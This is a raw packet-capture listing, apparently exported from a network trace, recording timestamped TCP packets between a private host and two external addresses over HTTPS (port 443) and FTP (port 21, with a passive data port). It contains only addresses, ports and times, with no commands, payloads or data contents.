                                            Oct 1, 2024 07:31:27.440995932 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.440999031 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.441010952 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.441039085 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.441060066 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.441133976 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.441200972 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.441278934 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.441355944 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.441441059 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.441500902 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.441667080 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.441756010 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:27.441776037 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.441807985 CEST4434970567.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:27.441890955 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:28.094083071 CEST49705443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:30.820378065 CEST4970621192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:30.825278997 CEST21497065.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:30.826407909 CEST4970621192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:31.443440914 CEST21497065.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:31.443697929 CEST4970621192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:31.448594093 CEST21497065.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:31.663798094 CEST21497065.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:31.663960934 CEST4970621192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:31.668778896 CEST21497065.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:31.951602936 CEST21497065.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:31.951843023 CEST4970621192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:31.956655025 CEST21497065.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:32.171857119 CEST21497065.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:32.172070980 CEST4970621192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:32.176824093 CEST21497065.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:32.392071962 CEST21497065.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:32.394761086 CEST4970621192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:32.399626017 CEST21497065.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:32.614883900 CEST21497065.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:32.618262053 CEST4970621192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:32.623303890 CEST21497065.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:32.838507891 CEST21497065.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:32.839288950 CEST4970763484192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:32.844130039 CEST63484497075.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:32.844284058 CEST4970763484192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:32.844326019 CEST4970621192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:32.849387884 CEST21497065.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:33.459727049 CEST21497065.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:33.460094929 CEST4970763484192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:33.460094929 CEST4970763484192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:33.464900017 CEST63484497075.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:33.465260983 CEST63484497075.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:33.465327024 CEST4970763484192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:33.507173061 CEST4970621192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:33.680572987 CEST21497065.2.84.236192.168.2.8
                                            Oct 1, 2024 07:31:33.725855112 CEST4970621192.168.2.85.2.84.236
                                            Oct 1, 2024 07:31:41.786953926 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:41.786988974 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:41.787081003 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:41.794106007 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:41.794121981 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.291261911 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.291407108 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.292821884 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.292835951 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.293073893 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.335236073 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.354573965 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.395406008 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.472955942 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.472965002 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.472979069 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.473063946 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.473078966 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.493941069 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.494008064 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.494016886 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.538355112 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.560305119 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.560313940 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.560347080 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.560378075 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.560398102 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.561147928 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.561155081 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.561204910 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.562130928 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.562139988 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.562195063 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.562227964 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.581329107 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.581337929 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.581401110 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.648977041 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.649074078 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.649225950 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.649282932 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.649869919 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.649947882 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.650115967 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.650171995 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.651119947 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.651204109 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.668951035 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.669043064 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.669066906 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.669075966 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.669099092 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.669116020 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.736114979 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.736191034 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.736670971 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.736727953 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.737266064 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.737354994 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.737591028 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.737673044 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.738312006 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.738373041 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.738400936 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.738467932 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.739365101 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.739448071 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.739456892 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.739526033 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.740243912 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.740305901 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.741082907 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.741168022 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.741174936 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.741245031 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.756692886 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.756755114 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.756758928 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.756772041 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.756864071 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.757179976 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.757303953 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.823666096 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.823755026 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.823858023 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.823915958 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.824202061 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.824275970 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.824424028 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.824554920 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.824708939 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.824764013 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.825177908 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.825232983 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.825248003 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.825318098 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.825799942 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.825839043 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.825877905 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.825881004 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.825889111 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.825898886 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.825956106 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.826833010 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.826874018 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.826895952 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.826901913 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.826925993 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.826931953 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.826989889 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.827004910 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.844234943 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.844317913 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.844326019 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.844412088 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.844481945 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.844489098 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.897703886 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.911277056 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.911339045 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.911370039 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.911375999 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.911411047 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.911427975 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.911626101 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.911691904 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.911861897 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.911940098 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.911941051 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.911952972 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.912002087 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.912239075 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.912317038 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.912559032 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.912650108 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.912651062 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.912661076 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.912734985 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.912734985 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.916268110 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.916337013 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.916443110 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.916507959 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.916626930 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.916711092 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.916826963 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.916882038 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.917083025 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.917162895 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.917176008 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.917234898 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.931786060 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.931850910 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.931930065 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.931986094 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.999285936 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.999357939 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.999391079 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.999398947 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.999474049 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.999536991 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.999587059 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.999629021 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.999634027 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.999634027 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.999640942 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.999696970 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.999763966 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.999805927 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.999854088 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.999854088 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:42.999859095 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.999869108 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:42.999922991 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.000009060 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.000092983 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.000194073 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.000266075 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.000272989 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.000286102 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.000350952 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.000536919 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.000593901 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.000602961 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.000608921 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.000644922 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.000665903 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.000732899 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.000782967 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.000811100 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.000883102 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.001416922 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.001610041 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.019500017 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.019572973 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.019679070 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.019730091 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.086464882 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.086508036 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.086559057 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.086570024 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.086591005 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.086646080 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.086718082 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.086771965 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.086853027 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.086911917 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.087013960 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.087076902 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.087140083 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.087199926 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.087368965 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.787640095 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.787796021 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.787858963 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.787944078 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.788022995 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.788032055 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.788039923 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.788115978 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.788233042 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.788315058 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.788389921 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.788465977 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.788589001 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.788626909 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.788642883 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.788649082 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.788666964 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.788799047 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.788840055 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.788855076 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.788942099 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.789009094 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.789014101 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.795793056 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.795875072 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.807706118 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.807815075 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.807930946 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.807988882 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.874722958 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.874799967 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.874811888 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.874819994 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.874871969 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.874991894 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.875045061 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.875463963 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.875515938 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.875536919 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.875544071 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.875574112 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.875576019 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.875597954 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.875602007 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.875612974 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.875654936 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.875658989 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.875695944 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.875700951 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.875715971 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.875746965 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.875814915 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.875821114 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.875830889 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.875890017 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.875895023 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.876070976 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.876110077 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.876127005 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.876132965 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.876225948 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.876225948 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.876352072 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.876405954 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.876498938 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.876564980 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.877281904 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.877449036 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.895172119 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.895276070 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.895354033 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.895406008 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.962119102 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.962201118 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.962210894 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.962239981 CEST4434971067.212.175.162192.168.2.8
                                            Oct 1, 2024 07:31:43.962281942 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:43.962281942 CEST49710443192.168.2.867.212.175.162
                                            Oct 1, 2024 07:31:44.008704901 CEST49710443192.168.2.867.212.175.162
